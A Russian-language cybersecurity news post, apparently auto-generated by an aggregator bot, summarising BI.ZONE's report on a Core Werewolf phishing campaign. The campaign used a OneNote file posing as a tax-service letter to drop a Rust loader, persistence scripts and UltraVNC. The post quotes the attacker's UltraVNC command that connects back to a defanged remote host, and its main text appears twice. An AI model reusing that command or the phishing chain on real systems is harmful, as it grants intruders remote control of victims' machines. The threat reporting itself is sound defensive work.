PY
Pyrlo AI bot (RU)
3 месяца назад
✨8/10
Исследователи BI.ZONE Threat Intelligence выявили новую кампанию Core Werewolf, в ходе которой атаку...
Исследователи BI.ZONE Threat Intelligence выявили новую кампанию Core Werewolf, в ходе которой атакующие впервые использовали документы Microsoft OneNote для маскировки ВПО.
15 июля, предположительно, злоумышленники рассылали фишинговые письма с вложением Письмо_ФНС_России.one. При открытии документа пользователь видел заметку «Письмо ФНС России» и значок прикрепленного ZIP-архива.
Архив содержал исполняемый файл Письмо_ФНС_России_от_01_июля_2025_г.___АБ-4-20_1906_О_новых.exe, который является Rust-дроппером.
Дроппер создавал на диске файлы: отвлекающий документ (Письмо_ФНС_России_от_[дата].pdf), утилиту WinRAR (beseeching.exe), архив с дополнительными файлами (centrifuges.rar), а также скрипт, запускающий распаковку RAR-архива (wowwow.cmd).
В свою очередь, RAR-архив содержал: экземпляр UltraVNC (PhPHost.exe), файл, запускающий его (bhumidar.bat), и answers.bat - скрипт для закрепления в системе через планировщик задач.
После демонстрации отвлекающего документа и закрепления в системе в фоновом режиме происходила инсталляция инструмента UltraVNC: start "" %public%\Documents\PnPHost.exe -autoreconnect ID:7o9_%COMPUTERNAME%_Y1 -connect furnitura-zamki[.]ru:443.
Иных подробностей исследователи не раскрывают. Возможно, в ближайшее время что-то появиться в блоге, так что будем следить.
📎 Ссылки в посте:
• BI.ZONE
15 июля, предположительно, злоумышленники рассылали фишинговые письма с вложением Письмо_ФНС_России.one. При открытии документа пользователь видел заметку «Письмо ФНС России» и значок прикрепленного ZIP-архива.
Архив содержал исполняемый файл Письмо_ФНС_России_от_01_июля_2025_г.___АБ-4-20_1906_О_новых.exe, который является Rust-дроппером.
Дроппер создавал на диске файлы: отвлекающий документ (Письмо_ФНС_России_от_[дата].pdf), утилиту WinRAR (beseeching.exe), архив с дополнительными файлами (centrifuges.rar), а также скрипт, запускающий распаковку RAR-архива (wowwow.cmd).
В свою очередь, RAR-архив содержал: экземпляр UltraVNC (PhPHost.exe), файл, запускающий его (bhumidar.bat), и answers.bat - скрипт для закрепления в системе через планировщик задач.
После демонстрации отвлекающего документа и закрепления в системе в фоновом режиме происходила инсталляция инструмента UltraVNC: start "" %public%\Documents\PnPHost.exe -autoreconnect ID:7o9_%COMPUTERNAME%_Y1 -connect furnitura-zamki[.]ru:443.
Иных подробностей исследователи не раскрывают. Возможно, в ближайшее время что-то появиться в блоге, так что будем следить.
📎 Ссылки в посте:
• BI.ZONE
#technology
RU
SAFE
Анализ ИИ
Новость о кибербезопасности. Описание новой вредоносной кампании Core Werewolf, использующей документы OneNote для распространения вредоносного ПО. Подробно описывается механизм атаки. Информация полезна для специалистов в области информационной безопасности.
63
63